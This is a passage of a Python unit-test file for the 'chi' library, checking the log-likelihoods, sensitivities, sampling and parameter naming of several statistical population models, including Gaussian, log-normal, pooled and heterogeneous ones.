sample = self.pop_model.sample(parameters, seed=seed)
n_samples = 1
self.assertEqual(sample.shape, (n_samples,))
# Test II: sample size > 1
seed = 1
parameters = [3, 2]
n_samples = 4
sample = self.pop_model.sample(
parameters, n_samples=n_samples, seed=seed)
self.assertEqual(
sample.shape, (n_samples,))
def test_sample_bad_input(self):
# Too many paramaters
parameters = [1, 1, 1, 1, 1]
with self.assertRaisesRegex(ValueError, 'The number of provided'):
self.pop_model.sample(parameters)
# Negative std
parameters = [1, -1]
with self.assertRaisesRegex(ValueError, 'A Gaussian distribution'):
self.pop_model.sample(parameters)
def test_set_parameter_names(self):
# Test some name
names = ['test', 'name']
self.pop_model.set_parameter_names(names)
self.assertEqual(
self.pop_model.get_parameter_names(), names)
# Set back to default name
self.pop_model.set_parameter_names(None)
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Mean')
self.assertEqual(names[1], 'Std.')
def test_set_parameter_names_bad_input(self):
# Wrong number of names
names = ['only', 'two', 'is', 'allowed']
with self.assertRaisesRegex(ValueError, 'Length of names'):
self.pop_model.set_parameter_names(names)
class TestHeterogeneousModel(unittest.TestCase):
"""
Tests the chi.HeterogeneousModel class.
"""
@classmethod
def setUpClass(cls):
cls.pop_model = chi.HeterogeneousModel()
def test_compute_log_likelihood(self):
# For efficiency the input is actually not checked, and 0 is returned
# regardless
parameters = 'some parameters'
observations = 'some observations'
score = self.pop_model.compute_log_likelihood(parameters, observations)
self.assertEqual(score, 0)
def test_compute_pointwise_ll(self):
# Test case I: Only the number of observations determines how many 0s
# are returned
# Test case I.1
parameters = [1]
observations = [0, 1, 1, 1]
scores = self.pop_model.compute_pointwise_ll(
parameters, observations)
self.assertEqual(len(scores), 4)
self.assertEqual(scores[0], 0)
self.assertEqual(scores[1], 0)
self.assertEqual(scores[2], 0)
self.assertEqual(scores[3], 0)
# Test case I.2
parameters = [1]
observations = [1, 2, 1, 10, 1]
scores = self.pop_model.compute_pointwise_ll(
parameters, observations)
self.assertEqual(len(scores), 5)
self.assertEqual(scores[0], 0)
self.assertEqual(scores[1], 0)
self.assertEqual(scores[2], 0)
self.assertEqual(scores[3], 0)
self.assertEqual(scores[4], 0)
def test_compute_sensitivities(self):
# For efficiency the input is actually not checked, and 0 is returned
# regardless
parameters = 'some parameters'
observations = ['some', 'observations']
score, sens = self.pop_model.compute_sensitivities(
parameters, observations)
self.assertEqual(score, 0)
self.assertEqual(len(sens), 2)
self.assertEqual(sens[0], 0)
self.assertEqual(sens[1], 0)
def test_get_parameter_names(self):
self.assertIsNone(self.pop_model.get_parameter_names())
def test_n_hierarchical_parameters(self):
n_ids = 10
n_hierachical_params = self.pop_model.n_hierarchical_parameters(n_ids)
self.assertEqual(len(n_hierachical_params), 2)
self.assertEqual(n_hierachical_params[0], n_ids)
self.assertEqual(n_hierachical_params[1], 0)
def test_n_parameters(self):
self.assertEqual(self.pop_model.n_parameters(), 0)
def test_sample(self):
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.sample('some params')
def test_set_get_parameter_names(self):
# Check default name
name = self.pop_model.get_parameter_names()
self.assertIsNone(name)
# Set name
name = ['some name']
self.pop_model.set_parameter_names(name)
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 1)
self.assertEqual(names[0], 'some name')
# Set to default
self.pop_model.set_parameter_names(None)
name = self.pop_model.get_parameter_names()
self.assertIsNone(name)
def test_set_parameter_names_bad_input(self):
with self.assertRaisesRegex(ValueError, 'Length of names has to be 1'):
self.pop_model.set_parameter_names('some params')
class TestLogNormalModel(unittest.TestCase):
"""
Tests the chi.LogNormalModel class.
"""
@classmethod
def setUpClass(cls):
cls.pop_model = chi.LogNormalModel()
def test_compute_log_likelihood(self):
# Hard to test exactly, but at least test some edge cases where
# loglikelihood is straightforward to compute analytically
n_ids = 10
# Test case I: psis = 1, sigma_log = 1
# Score reduces to
# -n_ids * np.log(2*pi) / 2 - n_ids * mu_log^2 / 2
# Test case I.1:
psis = [1] * n_ids
mu_log = 1
sigma_log = 1
ref_score = -n_ids * (np.log(2 * np.pi) + mu_log**2) / 2
parameters = [mu_log] + [sigma_log]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case I.2:
psis = [1] * n_ids
mu_log = 5
sigma_log = 1
ref_score = -n_ids * (np.log(2 * np.pi) + mu_log**2) / 2
parameters = [mu_log] + [sigma_log]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case II: psis = 1.
# Score reduces to
# -n_ids * log(sigma_log) - n_ids * log(2 * pi) / 2
# - n_ids * mu_log^2 / (2 * sigma_log^2)
# Test case II.1:
psis = [1] * n_ids
mu_log = 1
sigma_log = 2
ref_score = \
-n_ids * (
np.log(2 * np.pi * sigma_log**2)
+ mu_log**2 / sigma_log**2) / 2
parameters = [mu_log] + [sigma_log]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case II.2:
psis = [1] * n_ids
mu_log = 3
sigma_log = np.exp(3)
ref_score = \
-n_ids * (
np.log(2 * np.pi * sigma_log**2)
+ mu_log**2 / sigma_log**2) / 2
parameters = [mu_log] + [sigma_log]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case III: psis all the same, sigma_log = 1.
# Score reduces to
# -n_ids * log(psi) - n_ids * np.log(2 * pi) / 2
# - n_ids * (log(psi) - mu_log)^2 / 2
# Test case III.1
psis = [np.exp(4)] * n_ids
mu_log = 1
sigma_log = 1
ref_score = \
-n_ids * (4 + np.log(2 * np.pi) / 2 + (4 - mu_log)**2 / 2)
parameters = [mu_log] + [sigma_log]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case III.2
psis = [np.exp(3)] * n_ids
mu_log = 3
sigma_log = 1
ref_score = -n_ids * (3 + np.log(2 * np.pi) / 2)
parameters = [mu_log] + [sigma_log]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case IV: sigma_log negative or zero
# Test case IV.1
psis = [np.exp(10)] * n_ids
mu = 1
sigma = 0
parameters = [mu] + [sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(score, -np.inf)
# Test case IV.2
psis = [np.exp(10)] * n_ids
mu = 1
sigma = -10
parameters = [mu] + [sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(score, -np.inf)
def test_compute_pointwise_ll(self):
# Hard to test exactly, but at least test some edge cases where
# loglikelihood is straightforward to compute analytically
n_ids = 10
# Test case I: psis = 1, sigma_log = 1
# Score reduces to
# -n_ids * np.log(2*pi) / 2 - n_ids * mu_log^2 / 2
# Test case I.1:
psis = [1] * n_ids
mu_log = 1
sigma_log = 1
ref_score = -n_ids * (np.log(2 * np.pi) + mu_log**2) / 2
parameters = [mu_log] + [sigma_log]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(len(scores), 10)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 10))
# Test case I.2:
n_ids = 6
psis = [1] * n_ids
mu_log = 5
sigma_log = 1
ref_score = -n_ids * (np.log(2 * np.pi) + mu_log**2) / 2
parameters = [mu_log] + [sigma_log]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(len(scores), 6)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 6))
# Test case II: psis = 1.
# Score reduces to
# -n_ids * log(sigma_log) - n_ids * log(2 * pi) / 2
# - n_ids * mu_log^2 / (2 * sigma_log^2)
# Test case II.1:
n_ids = 10
psis = [1] * n_ids
mu_log = 1
sigma_log = np.exp(2)
ref_score = \
-n_ids * (
np.log(2 * np.pi * sigma_log**2)
+ mu_log**2 / sigma_log**2) / 2
parameters = [mu_log] + [sigma_log]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(len(scores), 10)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 10))
# Test case II.2:
psis = [1] * n_ids
mu_log = 3
sigma_log = np.exp(3)
ref_score = \
-n_ids * (
np.log(2 * np.pi * sigma_log**2)
+ mu_log**2 / sigma_log**2) / 2
parameters = [mu_log] + [sigma_log]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(len(scores), 10)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 10))
# Test case III: Different psis
psis = [1, 2]
mu = 1
sigma = 1
parameters = [mu] + [sigma]
ref_score = self.pop_model.compute_log_likelihood(parameters, psis)
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(len(scores), 2)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertNotEqual(scores[0], scores[1])
# Test case III: psis all the same, sigma_log = 1.
# Score reduces to
# -n_ids * log(psi) - n_ids * np.log(2 * pi) / 2
# - n_ids * (log(psi) - mu_log)^2 / 2
# Test case III.1
psis = [np.exp(4)] * n_ids
mu_log = 1
sigma_log = 1
ref_score = \
-n_ids * (4 + np.log(2 * np.pi) / 2 + (4 - mu_log)**2 / 2)
parameters = [mu_log] + [sigma_log]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(len(scores), 10)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 10))
# Test case III.2
psis = [np.exp(3)] * n_ids
mu_log = 3
sigma_log = 1
ref_score = -n_ids * (3 + np.log(2 * np.pi) / 2)
parameters = [mu_log] + [sigma_log]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(len(scores), 10)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 10))
# Test case IV: mu_log or sigma_log negative or zero
# Test case IV.1
psis = [np.exp(10)] * n_ids
mu = 1
sigma = 0
parameters = [mu] + [sigma]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(scores[0], -np.inf)
self.assertEqual(scores[1], -np.inf)
self.assertEqual(scores[2], -np.inf)
# Test case IV.2
psis = [np.exp(10)] * n_ids
mu = 1
sigma = -10
parameters = [mu] + [sigma]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(scores[0], -np.inf)
self.assertEqual(scores[1], -np.inf)
self.assertEqual(scores[2], -np.inf)
def test_compute_sensitivities(self):
# Hard to test exactly, but at least test some edge cases where
# loglikelihood is straightforward to compute analytically
n_ids = 10
# Test case I: psis = 1, sigma_log = 1
# Sensitivities reduce to
# dpsi = -1 + mu_log
# dmu = - mu_log * nids
# dsigma = -(1 + mu_log^2) * nids
# Test case I.1:
psis = [1] * n_ids
mu_log = 1
sigma_log = 1
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = -1 + mu_log
ref_dmu = -mu_log * n_ids
ref_dsigma = (mu_log**2 - 1) * n_ids
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_dpsi)
self.assertEqual(sens[1], ref_dpsi)
self.assertEqual(sens[2], ref_dpsi)
self.assertEqual(sens[3], ref_dpsi)
self.assertEqual(sens[4], ref_dpsi)
self.assertEqual(sens[5], ref_dpsi)
self.assertEqual(sens[6], ref_dpsi)
self.assertEqual(sens[7], ref_dpsi)
self.assertEqual(sens[8], ref_dpsi)
self.assertEqual(sens[9], ref_dpsi)
self.assertEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case I.2:
psis = [1] * n_ids
mu_log = 5
sigma_log = 1
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = -1 + mu_log
ref_dmu = -mu_log * n_ids
ref_dsigma = (mu_log**2 - 1) * n_ids
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_dpsi)
self.assertEqual(sens[1], ref_dpsi)
self.assertEqual(sens[2], ref_dpsi)
self.assertEqual(sens[3], ref_dpsi)
self.assertEqual(sens[4], ref_dpsi)
self.assertEqual(sens[5], ref_dpsi)
self.assertEqual(sens[6], ref_dpsi)
self.assertEqual(sens[7], ref_dpsi)
self.assertEqual(sens[8], ref_dpsi)
self.assertEqual(sens[9], ref_dpsi)
self.assertEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case II: psis = 1.
# Sensitivities reduce to
# dpsi = -1 + mu_log / var_log
# dmu = - mu_log / var_log * nids
# dsigma = (mu_log^2 / var_log - 1) / std_log * nids
# Test case II.1:
psis = [1] * n_ids
mu_log = 1
sigma_log = np.exp(2)
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = -1 + mu_log / sigma_log**2
ref_dmu = -mu_log / sigma_log**2 * n_ids
ref_dsigma = (mu_log**2 / sigma_log**2 - 1) / sigma_log * n_ids
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_dpsi)
self.assertEqual(sens[1], ref_dpsi)
self.assertEqual(sens[2], ref_dpsi)
self.assertEqual(sens[3], ref_dpsi)
self.assertEqual(sens[4], ref_dpsi)
self.assertEqual(sens[5], ref_dpsi)
self.assertEqual(sens[6], ref_dpsi)
self.assertEqual(sens[7], ref_dpsi)
self.assertEqual(sens[8], ref_dpsi)
self.assertEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case II.2:
psis = [1] * n_ids
mu_log = 3
sigma_log = np.exp(3)
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = -1 + mu_log / sigma_log**2
ref_dmu = -mu_log / sigma_log**2 * n_ids
ref_dsigma = (mu_log**2 / sigma_log**2 - 1) / sigma_log * n_ids
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_dpsi)
self.assertEqual(sens[1], ref_dpsi)
self.assertEqual(sens[2], ref_dpsi)
self.assertEqual(sens[3], ref_dpsi)
self.assertEqual(sens[4], ref_dpsi)
self.assertEqual(sens[5], ref_dpsi)
self.assertEqual(sens[6], ref_dpsi)
self.assertEqual(sens[7], ref_dpsi)
self.assertEqual(sens[8], ref_dpsi)
self.assertEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case III: psis all the same, sigma_log = 1.
# Score reduces to
# dpsi = (-1 + mu_log - log psi) / psi
# dmu = (log psi - mu_log) * nids
# dsigma = ((log psi - mu_log)^2 - 1) * nids
# Test case III.1
psi = [np.exp(4)] * n_ids
mu_log = 1
sigma_log = 1
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psi)
ref_dpsi = (-1 + mu_log - np.log(psi[0])) / psi[0]
ref_dmu = (np.log(psi[0]) - mu_log) * n_ids
ref_dsigma = ((np.log(psi[0]) - mu_log)**2 - 1) * n_ids
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psi)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_dpsi)
self.assertEqual(sens[1], ref_dpsi)
self.assertEqual(sens[2], ref_dpsi)
self.assertEqual(sens[3], ref_dpsi)
self.assertEqual(sens[4], ref_dpsi)
self.assertEqual(sens[5], ref_dpsi)
self.assertEqual(sens[6], ref_dpsi)
self.assertEqual(sens[7], ref_dpsi)
self.assertEqual(sens[8], ref_dpsi)
self.assertEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case III.2
psi = [np.exp(3)] * n_ids
mu_log = 3
sigma_log = 1
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psi)
ref_dpsi = (-1 + mu_log - np.log(psi[0])) / psi[0]
ref_dmu = (np.log(psi[0]) - mu_log) * n_ids
ref_dsigma = ((np.log(psi[0]) - mu_log)**2 - 1) * n_ids
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psi)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_dpsi)
self.assertEqual(sens[1], ref_dpsi)
self.assertEqual(sens[2], ref_dpsi)
self.assertEqual(sens[3], ref_dpsi)
self.assertEqual(sens[4], ref_dpsi)
self.assertEqual(sens[5], ref_dpsi)
self.assertEqual(sens[6], ref_dpsi)
self.assertEqual(sens[7], ref_dpsi)
self.assertEqual(sens[8], ref_dpsi)
self.assertEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case IV: Compare gradients to numpy.gradient
epsilon = 0.00001
n_parameters = n_ids + self.pop_model.n_parameters()
parameters = np.full(shape=n_parameters, fill_value=0.3)
ref_sens = []
for index in range(n_parameters):
# Construct parameter grid
low = parameters.copy()
low[index] -= epsilon
high = parameters.copy()
high[index] += epsilon
# Compute reference using numpy.gradient
sens = np.gradient(
[
self.pop_model.compute_log_likelihood(
low[n_ids:], low[:n_ids]),
self.pop_model.compute_log_likelihood(
parameters[n_ids:], parameters[:n_ids]),
self.pop_model.compute_log_likelihood(
high[n_ids:], high[:n_ids])],
(epsilon))
ref_sens.append(sens[1])
# Compute sensitivities with hierarchical model
_, sens = self.pop_model.compute_sensitivities(
parameters[n_ids:], parameters[:n_ids])
self.assertEqual(len(sens), 12)
self.assertAlmostEqual(sens[0], ref_sens[0])
self.assertAlmostEqual(sens[1], ref_sens[1])
self.assertAlmostEqual(sens[2], ref_sens[2])
self.assertAlmostEqual(sens[3], ref_sens[3])
self.assertAlmostEqual(sens[4], ref_sens[4])
self.assertAlmostEqual(sens[5], ref_sens[5])
self.assertAlmostEqual(sens[6], ref_sens[6])
self.assertAlmostEqual(sens[7], ref_sens[7])
self.assertAlmostEqual(sens[8], ref_sens[8])
self.assertAlmostEqual(sens[9], ref_sens[9])
self.assertAlmostEqual(sens[10], ref_sens[10], 5)
self.assertAlmostEqual(sens[11], ref_sens[11], 5)
# Test case V: mu_log or sigma_log negative or zero
# Test case V.1
psis = [np.exp(10)] * n_ids
mu = 1
sigma = 0
parameters = [mu] + [sigma]
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, -np.inf)
self.assertEqual(sens[0], np.inf)
self.assertEqual(sens[1], np.inf)
self.assertEqual(sens[2], np.inf)
# Test case V.2
psis = [np.exp(10)] * n_ids
mu = 1
sigma = -10
parameters = [mu] + [sigma]
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, -np.inf)
self.assertEqual(sens[0], np.inf)
self.assertEqual(sens[1], np.inf)
self.assertEqual(sens[2], np.inf)
def test_get_mean_and_std(self):
# Test case I: std_log = 0
# Then:
# mean = exp(mean_log)
# std = 0
# Test case I.1:
mean_log = 1
std_log = 0
parameters = [mean_log, std_log]
mean, std = self.pop_model.get_mean_and_std(parameters)
self.assertEqual(np.exp(mean_log), mean)
self.assertEqual(std_log, std)
# Test case I.2:
mean_log = -3
std_log = 0
parameters = [mean_log, std_log]
mean, std = self.pop_model.get_mean_and_std(parameters)
self.assertEqual(np.exp(mean_log), mean)
self.assertEqual(std_log, std)
# Test case II: mean_log = 0
# Then:
# mean = exp(std_log**2/2)
# std = sqrt(exp(std_log**2)*(exp(std_log**2) - 1))
# Test case I.1:
mean_log = 0
std_log = 1
# Compute references
mean_ref = np.exp(std_log**2 / 2)
std_ref = np.sqrt(
np.exp(std_log**2)*(np.exp(std_log**2) - 1))
parameters = [mean_log, std_log]
mean, std = self.pop_model.get_mean_and_std(parameters)
self.assertEqual(mean, mean_ref)
self.assertEqual(std, std_ref)
# Test case I.2:
mean_log = 0
std_log = 2
# Compute references
mean_ref = np.exp(std_log**2 / 2)
std_ref = np.sqrt(
np.exp(std_log**2)*(np.exp(std_log**2) - 1))
parameters = [mean_log, std_log]
mean, std = self.pop_model.get_mean_and_std(parameters)
self.assertEqual(mean, mean_ref)
self.assertEqual(std, std_ref)
# Test case II: Negative standard deviation
mean_log = 0
std_log = -1
parameters = [mean_log, std_log]
with self.assertRaisesRegex(ValueError, 'The standard deviation'):
self.pop_model.get_mean_and_std(parameters)
def test_get_parameter_names(self):
names = ['Mean log', 'Std. log']
self.assertEqual(self.pop_model.get_parameter_names(), names)
def test_n_hierarchical_parameters(self):
n_ids = 10
n_hierarchical_params = self.pop_model.n_hierarchical_parameters(n_ids)
self.assertEqual(len(n_hierarchical_params), 2)
self.assertEqual(n_hierarchical_params[0], n_ids)
self.assertEqual(n_hierarchical_params[1], 2)
def test_n_parameters(self):
self.assertEqual(self.pop_model.n_parameters(), 2)
def test_sample(self):
# Test I: sample size 1
seed = 42
parameters = [3, 2]
sample = self.pop_model.sample(parameters, seed=seed)
n_samples = 1
self.assertEqual(sample.shape, (n_samples,))
# Test II: sample size > 1
parameters = [3, 2]
n_samples = 4
sample = self.pop_model.sample(
parameters, n_samples=n_samples, seed=seed)
self.assertEqual(
sample.shape, (n_samples,))
def test_sample_bad_input(self):
# Too many paramaters
parameters = [1, 1, 1, 1, 1]
with self.assertRaisesRegex(ValueError, 'The number of provided'):
self.pop_model.sample(parameters)
# Negative std
parameters = [1, -1]
with self.assertRaisesRegex(ValueError, 'A log-normal distribution'):
self.pop_model.sample(parameters)
def test_set_parameter_names(self):
# Test some name
names = ['test', 'name']
self.pop_model.set_parameter_names(names)
self.assertEqual(
self.pop_model.get_parameter_names(), names)
# Set back to default name
self.pop_model.set_parameter_names(None)
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Mean log')
self.assertEqual(names[1], 'Std. log')
def test_set_parameter_names_bad_input(self):
# Wrong number of names
names = ['only', 'two', 'is', 'allowed']
with self.assertRaisesRegex(ValueError, 'Length of names'):
self.pop_model.set_parameter_names(names)
class TestPooledModel(unittest.TestCase):
"""
Tests the chi.PooledModel class.
"""
@classmethod
def setUpClass(cls):
cls.pop_model = chi.PooledModel()
def test_compute_log_likelihood(self):
# Test case I: observation differ from parameter
# Test case I.1
parameters = [1]
observations = [0, 1, 1, 1]
score = self.pop_model.compute_log_likelihood(parameters, observations)
self.assertEqual(score, -np.inf)
# Test case I.1
parameters = [1]
observations = [1, 1, 1, 10]
score = self.pop_model.compute_log_likelihood(parameters, observations)
self.assertEqual(score, -np.inf)
# Test case II: all values agree with parameter
parameters = [1]
observations = [1, 1, 1, 1]
score = self.pop_model.compute_log_likelihood(parameters, observations)
self.assertEqual(score, 0)
def test_compute_pointwise_ll(self):
# Test case I: observation differ from parameter
# Test case I.1
parameters = [1]
observations = [0, 1, 1, 1]
scores = self.pop_model.compute_pointwise_ll(
parameters, observations)
self.assertEqual(len(scores), 4)
self.assertEqual(scores[0], -np.inf)
self.assertEqual(scores[1], 0)
self.assertEqual(scores[2], 0)
self.assertEqual(scores[3], 0)
# Test case I.2
parameters = [1]
observations = [1, 2, 1, 10, 1]
scores = self.pop_model.compute_pointwise_ll(
parameters, observations)
self.assertEqual(len(scores), 5)
self.assertEqual(scores[0], 0)
self.assertEqual(scores[1], -np.inf)
self.assertEqual(scores[2], 0)
self.assertEqual(scores[3], -np.inf)
self.assertEqual(scores[4], 0)
# Test case II: all values agree with parameter
parameters = [1]
observations = [1, 1, 1]
scores = self.pop_model.compute_pointwise_ll(
parameters, observations)
self.assertEqual(len(scores), 3)
self.assertEqual(scores[0], 0)
self.assertEqual(scores[1], 0)
self.assertEqual(scores[2], 0)
def test_compute_sensitivities(self):
# Test case I: observation differ from parameter
# Test case I.1
parameters = [1]
observations = [0, 1, 1, 1]
score, sens = self.pop_model.compute_sensitivities(
parameters, observations)
self.assertEqual(score, -np.inf)
self.assertEqual(len(sens), 5)
self.assertEqual(sens[0], np.inf)
self.assertEqual(sens[1], np.inf)
self.assertEqual(sens[2], np.inf)
self.assertEqual(sens[3], np.inf)
self.assertEqual(sens[4], np.inf)
# Test case I.1
parameters = [1]
observations = [1, 1, 1, 10]
score, sens = self.pop_model.compute_sensitivities(
parameters, observations)
self.assertEqual(score, -np.inf)
self.assertEqual(len(sens), 5)
self.assertEqual(sens[0], np.inf)
self.assertEqual(sens[1], np.inf)
self.assertEqual(sens[2], np.inf)
self.assertEqual(sens[3], np.inf)
self.assertEqual(sens[4], np.inf)
# Test case II: all values agree with parameter
parameters = [1]
observations = [1, 1, 1, 1]
score, sens = self.pop_model.compute_sensitivities(
parameters, observations)
self.assertEqual(score, 0)
self.assertEqual(len(sens), 5)
self.assertEqual(sens[0], 0)
self.assertEqual(sens[1], 0)
self.assertEqual(sens[2], 0)
self.assertEqual(sens[3], 0)
self.assertEqual(sens[4], 0)
def test_get_parameter_names(self):
names = ['Pooled']
self.assertEqual(self.pop_model.get_parameter_names(), names)
def test_n_hierarchical_parameters(self):
n_ids = 10
n_hierarchical_params = self.pop_model.n_hierarchical_parameters(n_ids)
self.assertEqual(len(n_hierarchical_params), 2)
self.assertEqual(n_hierarchical_params[0], 0)
self.assertEqual(n_hierarchical_params[1], 1)
def test_n_parameters(self):
self.assertEqual(self.pop_model.n_parameters(), 1)
def test_sample(self):
# Test one sample size 1
parameters = [3]
sample = self.pop_model.sample(parameters)
n_samples = 1
self.assertEqual(sample.shape, (n_samples,))
self.assertEqual(sample[0], parameters[0])
# Test one sample size > 1
parameters = [3]
n_samples = 4
sample = self.pop_model.sample(parameters, n_samples=n_samples)
self.assertEqual(
sample.shape, (n_samples,))
self.assertEqual(sample[0], parameters[0])
self.assertEqual(sample[1], parameters[0])
self.assertEqual(sample[2], parameters[0])
self.assertEqual(sample[3], parameters[0])
def test_sample_bad_input(self):
# Too many paramaters
parameters = [1, 1, 1, 1, 1]
with self.assertRaisesRegex(ValueError, 'The number of provided'):
self.pop_model.sample(parameters)
def test_set_parameter_names(self):
# Test some name
names = ['test name']
self.pop_model.set_parameter_names(names)
self.assertEqual(
self.pop_model.get_parameter_names(), names)
# Set back to default name
self.pop_model.set_parameter_names(None)
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 1)
self.assertEqual(names[0], 'Pooled')
def test_set_parameter_names_bad_input(self):
# Wrong number of names
names = ['only', 'one', 'is', 'allowed']
with self.assertRaisesRegex(ValueError, 'Length of names'):
self.pop_model.set_parameter_names(names)
class TestPopulationModel(unittest.TestCase):
"""
Tests the chi.PopulationModel class.
"""
@classmethod
def setUpClass(cls):
cls.pop_model = chi.PopulationModel()
def test_compute_log_likelihood(self):
parameters = 'some parameters'
observations = 'some observations'
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.compute_log_likelihood(parameters, observations)
def test_compute_pointwise_ll(self):
parameters = 'some parameters'
observations = 'some observations'
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.compute_pointwise_ll(parameters, observations)
def test_compute_sensitivities(self):
parameters = 'some parameters'
observations = 'some observations'
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.compute_sensitivities(parameters, observations)
def test_get_parameter_names(self):
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.get_parameter_names()
def test_n_hierarchical_parameters(self):
n_ids = 'some ids'
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.n_hierarchical_parameters(n_ids)
def test_n_parameters(self):
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.n_parameters()
def test_transforms_individual_parameters(self):
self.assertFalse(self.pop_model.transforms_individual_parameters())
def test_sample(self):
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.sample('some values')
def test_set_parameter_names(self):
with self.assertRaisesRegex(NotImplementedError, ''):
self.pop_model.set_parameter_names('some name')
class TestReducedPopulationModel(unittest.TestCase):
"""
Tests the chi.ReducedPopulationModel class.
"""
@classmethod
def setUpClass(cls):
# Test case I: Non-covariate population model
pop_model = chi.LogNormalModel()
cls.pop_model = chi.ReducedPopulationModel(pop_model)
# Test case II: Covariate population model
cls.bare_pop_model = chi.CovariatePopulationModel(
chi.GaussianModel(),
chi.LogNormalLinearCovariateModel(n_covariates=2)
)
cls.cpop_model = chi.ReducedPopulationModel(cls.bare_pop_model)
def test_bad_instantiation(self):
model = 'Bad type'
with self.assertRaisesRegex(TypeError, 'The population model'):
chi.ReducedPopulationModel(model)
def test_compute_individual_parameters(self):
# Test case I: Model does not transform psi
parameters = [1, 10]
eta = [0.2, -0.3, 1, 5]
psi = self.pop_model.compute_individual_parameters(
parameters, eta)
self.assertEqual(len(psi), 4)
self.assertEqual(psi[0], eta[0])
self.assertEqual(psi[1], eta[1])
self.assertEqual(psi[2], eta[2])
self.assertEqual(psi[3], eta[3])
# Test case II: Model transforms psi
# Test case II.1: No fixed parameters
parameters = [1, 1, -1, 1]
